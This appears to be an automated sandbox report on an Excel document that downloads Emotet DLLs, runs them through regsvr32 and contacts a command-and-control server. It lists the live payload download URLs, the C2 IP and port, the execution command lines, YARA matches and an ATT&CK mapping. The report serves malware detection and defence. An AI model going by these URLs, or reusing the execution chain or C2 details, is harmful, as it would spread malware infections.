                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000007.00000002.932271979.000000000023A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF74F3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74FBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF74FBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000007FEF70CBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000007FEF70C3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF706BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000007FEF706BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF7063280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000007FEF7063280

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		Path Interception111
                      Process Injection                      		131
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory1
                      Query Registry                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion                      		Security Account Manager121
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                      Ingress Tool Transfer                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection                      		NTDS1
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      Process Discovery                      		SSHKeyloggingData Transfer Size Limits22
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information                      		Proc Filesystem16
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632101 Sample: Datei_26744565.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 10 other signatures 2->62 7 EXCEL.EXE 7 26 2->7         started        process3 dnsIp4 48 kolejleri.com 85.114.142.153, 49172, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 7->48 50 stainedglassexpress.com 66.71.247.68, 49173, 80 TOTAL-SERVER-SOLUTIONSUS United States 7->50 52 2 other IPs or domains 7->52 32 C:\Users\user\uxevr4.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr3.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr2.ocx, PE32+ 7->36 dropped 38 6 other malicious files 7->38 dropped 66 Document exploit detected (creates forbidden files) 7->66 68 Document exploit detected (UrlDownloadToFile) 7->68 12 regsvr32.exe 2 7->12         started        16 regsvr32.exe 2 7->16         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        file5 signatures6 process7 file8 40 C:\Windows\System32\...\fEKh.dll (copy), PE32+ 12->40 dropped 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->70 22 regsvr32.exe 12->22         started        42 C:\Windows\System32\...\pDnxsvRJXW.dll (copy), PE32+ 16->42 dropped 25 regsvr32.exe 2 16->25         started        44 C:\Windows\System32\...\Zazriwdkuo.dll (copy), PE32+ 18->44 dropped 28 regsvr32.exe 18->28         started        46 C:\Windows\System32\...\lwQjfM.dll (copy), PE32+ 20->46 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 64 System process connects to network (likely due to code injection or exploit) 22->64 54 165.22.73.229, 49175, 49177, 49178 DIGITALOCEAN-ASNUS United States 25->54 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Datei_26744565.xls39%ReversingLabsDocument-Excel.Trojan.Abracadabra

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr3.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr4.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll61%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr3.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr4.ocx29%MetadefenderBrowse
                      C:\Users\user\uxevr4.ocx61%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)29%MetadefenderBrowse
                      C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)61%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)59%ReversingLabsWin64.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.2.regsvr32.exe.450000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.regsvr32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      10.2.regsvr32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      7.2.regsvr32.exe.2e0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.regsvr32.exe.4f0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.regsvr32.exe.1fe0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      kolejleri.com12%VirustotalBrowse
                      milanstaffing.com7%VirustotalBrowse
                      learnviaonline.com9%VirustotalBrowse
                      stainedglassexpress.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://learnviaonline.com/wp-admin/qGb/14%VirustotalBrowse
                      http://learnviaonline.com/wp-admin/qGb/100%Avira URL Cloudmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.comodoc0%Avira URL Cloudsafe
                      http://milanstaffing.com/images/D4TRnDubF/13%VirustotalBrowse
                      http://milanstaffing.com/images/D4TRnDubF/100%Avira URL Cloudmalware
                      http://kolejleri.com/wp-admin/REvup/18%VirustotalBrowse
                      http://kolejleri.com/wp-admin/REvup/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://165.22.73.229:8080/0%Avira URL Cloudsafe
                      https://165.22.73.229/0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://165.22.73.229/E&0%Avira URL Cloudsafe
                      https://secure.comodo.co0%Avira URL Cloudsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://crl.com0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://165.22.73.229:8080/40%Avira URL Cloudsafe
                      https://165.22.73.229:8080/00%Avira URL Cloudsafe
                      https://165.22.73.229/d0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kolejleri.com
                      		85.114.142.153
                      		truetrueunknown
                      milanstaffing.com
                      		107.189.3.39
                      		truefalseunknown
                      learnviaonline.com
                      		103.171.181.223
                      		truefalseunknown
                      stainedglassexpress.com
                      		66.71.247.68
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://learnviaonline.com/wp-admin/qGb/true
                      • 14%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://milanstaffing.com/images/D4TRnDubF/true
                      • 13%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://kolejleri.com/wp-admin/REvup/true
                      • 18%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.comodocregsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://165.22.73.229:8080/regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://165.22.73.229/regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214649654.0000000000305000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://165.22.73.229/E&regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://secure.comodo.coregsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.comregsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://165.22.73.229:8080/4regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://165.22.73.229:8080/0regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://165.22.73.229/dregsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            85.114.142.153
                            		kolejleri.comGermany
                            		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
                            103.171.181.223
                            		learnviaonline.comunknown
                            		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                            107.189.3.39
                            		milanstaffing.comUnited States
                            		53667PONYNETUSfalse
                            165.22.73.229
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            66.71.247.68
